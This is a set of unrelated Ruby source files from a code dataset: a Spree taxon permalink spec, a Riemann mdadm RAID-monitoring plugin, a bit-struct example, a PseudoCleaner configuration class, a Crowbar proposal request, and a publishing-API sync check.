e982a7df162dad9c055d471bff30041dc6966aa0 | 2,172 | # coding: UTF-8
require 'spec_helper'
describe Spree::Taxon, :type => :model do
let(:taxon) { FactoryGirl.build(:taxon, :name => "Ruby on Rails") }
describe '#to_param' do
subject { super().to_param }
it { is_expected.to eql taxon.permalink }
end
context "set_permalink" do
it "should set permalink correctly when no parent present" do
taxon.set_permalink
expect(taxon.permalink).to eql "ruby-on-rails"
end
it "should support Chinese characters" do
taxon.name = "你好"
taxon.set_permalink
expect(taxon.permalink).to eql 'ni-hao'
end
context "with parent taxon" do
let(:parent) { FactoryGirl.build(:taxon, :permalink => "brands") }
before { allow(taxon).to receive_messages parent: parent }
it "should set permalink correctly when taxon has parent" do
taxon.set_permalink
expect(taxon.permalink).to eql "brands/ruby-on-rails"
end
it "should set permalink correctly with existing permalink present" do
taxon.permalink = "b/rubyonrails"
taxon.set_permalink
expect(taxon.permalink).to eql "brands/rubyonrails"
end
it "should support Chinese characters" do
taxon.name = "我"
taxon.set_permalink
expect(taxon.permalink).to eql "brands/wo"
end
# Regression test for #3390
context "setting a new node sibling position via :child_index=" do
let(:idx) { rand(0..100) }
before { allow(parent).to receive(:move_to_child_with_index) }
context "taxon is not new" do
before { allow(taxon).to receive(:new_record?).and_return(false) }
it "passes the desired index move_to_child_with_index of :parent " do
expect(taxon).to receive(:move_to_child_with_index).with(parent, idx)
taxon.child_index = idx
end
end
end
end
end
# Regression test for #2620
context "creating a child node using first_or_create" do
let(:taxonomy) { create(:taxonomy) }
it "does not error out" do
taxonomy.root.children.unscoped.where(:name => "Some name").first_or_create
end
end
end
| 28.96 | 81 | 0.649632 |
03dad98a20638346595b490a37c8233d363c06f3 | 1,581 | class Riemann::Babbler::Plugin::Mdadm < Riemann::Babbler::Plugin
def init
plugin.set_default(:service, 'mdadm')
plugin.set_default(:interval, 60)
plugin.states.set_default(:critical, 1)
end
def run_plugin
File.exists? '/proc/mdstat'
end
def rm_bracket(text)
text.gsub('[', '').gsub(']', '')
end
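  # Note: a healthy mdstat status such as "UUU" contains only "U"s, so stripping them
  # leaves an empty string; a degraded status such as "UU_" keeps the "_" marker.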
def mdadm_status_well?(text)
text.gsub(/U/, '').empty?
end
def collect
file = File.read('/proc/mdstat').split("\n")
status = Array.new
file.each_with_index do |line, index|
next unless line.include?('blocks')
device = file[index-1].split(':')[0].strip
mdstatus = rm_bracket(line.split(' ').last) # UUU
      next if mdadm_status_well?(mdstatus) # skip arrays where every member is up
      if mdstatus == plugin.states.send(device).to_s # skip when this state is pinned in the config
status << { :service => plugin.service + " #{device}", :metric => 1, :state => 'ok', :description => "mdadm failed device #{device}, but disabled in config" }
next
end
status << { :service => plugin.service + " #{device}", :metric => 1, :description => "mdadm failed device #{device}: #{get_failed_parts(device)}" }
end
status
end
def get_failed_parts (device)
begin
failed_parts = []
Dir["/sys/block/#{device}/md/dev-*"].each do |p|
state = File.read("#{p}/state").strip
next unless state != 'in_sync'
p.gsub!(/.+\/dev-/, '')
failed_parts << "#{p} (#{state})"
end
failed_parts.join(', ')
rescue
nil
end
end
end
| 27.736842 | 166 | 0.596458 |
e9251a8b4662395c0837a51f69f8e8e248f000e7 | 545 | # an example where a field may crosse one or two byte boundaries
#
# try with arguments like 4, 12, and 13 to see the difference
#
# based on test case from Jon Hart
require 'bit-struct'
class Foo < BitStruct
unsigned :a, 4
unsigned :b, 8
unsigned :c, (ARGV[0] || (raise "USAGE: #{$0} bits")).to_i
end
puts Foo.describe
foo = Foo.new
p foo
p foo.unpack("B*").first.scan(/\d{8,8}/)
puts
foo.c = 3123
p foo
p foo.unpack("B*").first.scan(/\d{8,8}/)
puts
foo.c = (2**(ARGV[0].to_i)-1)
p foo
p foo.unpack("B*").first.scan(/\d{8,8}/)
puts
| 17.580645 | 64 | 0.645872 |
ac3d251414bc318817093b209a74fb5191722d43 | 3,011 | require "singleton"
module PseudoCleaner
class Configuration
include Singleton
# A simple configuration class for the PseudoCleaner
#
# Configurations:
# output_diagnostics - true/false
# if true, the system will use puts to output information about what it is doing...
attr_accessor :output_diagnostics
attr_accessor :clean_database_before_tests
attr_accessor :reset_auto_increment
attr_accessor :single_cleaner_set
attr_accessor :post_transaction_analysis
attr_accessor :db_connections
attr_accessor :peek_data_on_error
attr_accessor :peek_data_not_on_error
attr_accessor :enable_full_data_dump_tag
attr_accessor :disable_cornucopia_output
attr_accessor :benchmark
attr_accessor :redis_track_reads
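    # A minimal usage sketch (illustrative only; uses just the accessors defined above):
    #   PseudoCleaner::Configuration.current_instance.output_diagnostics = true
    #   PseudoCleaner::Configuration.current_instance.benchmark = true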
def self.current_instance
self.instance
end
def initialize
@output_diagnostics = false # false to keep the noise level down...
@clean_database_before_tests = false # false because I think it will annoy developers...
@reset_auto_increment = true # true because I think it should be done
@single_cleaner_set = true # true because I hope it will improve performance
@post_transaction_analysis = false # should only be set true if you are searching for a problem
@db_connections = {}
@peek_data_on_error = true
@peek_data_not_on_error = false
@enable_full_data_dump_tag = true
@disable_cornucopia_output = false
@benchmark = false
@redis_track_reads = false
end
    # Backwards compatibility...
def self.db_connection=(connection)
self.instance.db_connection = connection
end
def self.db_connection(type)
self.instance.db_connection(type)
end
def db_connection=(connection)
if Object.const_defined?("ActiveRecord", false) && ActiveRecord.const_defined?("Base", false)
table_is_active_record = connection == ActiveRecord::Base
table_super_class = connection.superclass if connection
while !table_is_active_record && table_super_class
table_is_active_record = (table_super_class == ActiveRecord::Base)
table_super_class = table_super_class.superclass
end
@db_connections[:active_record] = connection if table_is_active_record
end
if Object.const_defined?("Sequel", false) && Sequel.const_defined?("Model", false)
@db_connections[:sequel] = connection
end
end
def db_connection(type)
if (!type)
if Object.const_defined?("Sequel", false) && Sequel.const_defined?("Model", false)
type = :sequel
else
type = :active_record
end
end
if type == :sequel
@db_connections[type] ||= Sequel::DATABASES[0]
else
@db_connections[type] ||= ActiveRecord::Base
end
@db_connections[type]
end
end
end | 34.215909 | 111 | 0.672534 |
bf5c66322e91d5b80ed081f04644ede8ac1c80fe | 1,587 | #
# Copyright 2015, SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "easy_diff"
module Crowbar
module Client
module Request
module Proposal
#
# Implementation for the proposal create request
#
class Create < Base
#
# Override the request content
#
# @return [Hash] the content for the request
#
def content
super.easy_merge!(
attrs.payload.to_hash
)
end
#
# HTTP method that gets used by the request
#
# @return [Symbol] the method for the request
#
def method
:put
end
#
# Path to the API endpoint for the request
#
# @return [String] path to the API endpoint
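          #   (for illustration, a hypothetical barclamp named "database" would yield
          #   "crowbar/database/1.0/proposals")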
#
def url
[
"crowbar",
attrs.barclamp,
"1.0",
"proposals"
].join("/")
end
end
end
end
end
end
| 24.415385 | 74 | 0.553245 |
abc41f2718152dc185ea60bba464b123df219d5f | 1,099 | statistics_announcements = StatisticsAnnouncement.unscoped.includes(:publication).all
check = DataHygiene::PublishingApiSyncCheck.new(statistics_announcements)
def has_been_redirected?(statistics_announcement)
publication_published?(statistics_announcement) || statistics_announcement.unpublished?
end
def publication_published?(statistics_announcement)
statistics_announcement.publication && statistics_announcement.publication.published?
end
check.add_expectation("base_path") do |content_store_payload, model|
content_store_payload["base_path"] == model.public_path
end
check.add_expectation("format") do |content_store_payload, model|
if has_been_redirected?(model)
content_store_payload["format"] == "redirect"
else
content_store_payload["format"] == "statistics_announcement"
end
end
check.add_expectation("title") do |content_store_payload, model|
if has_been_redirected?(model)
    # announcements that relate to published statistics have a 'null' title,
    # so we can ignore them here
true
else
content_store_payload["title"] == model.title
end
end
check.perform
| 31.4 | 89 | 0.806187 |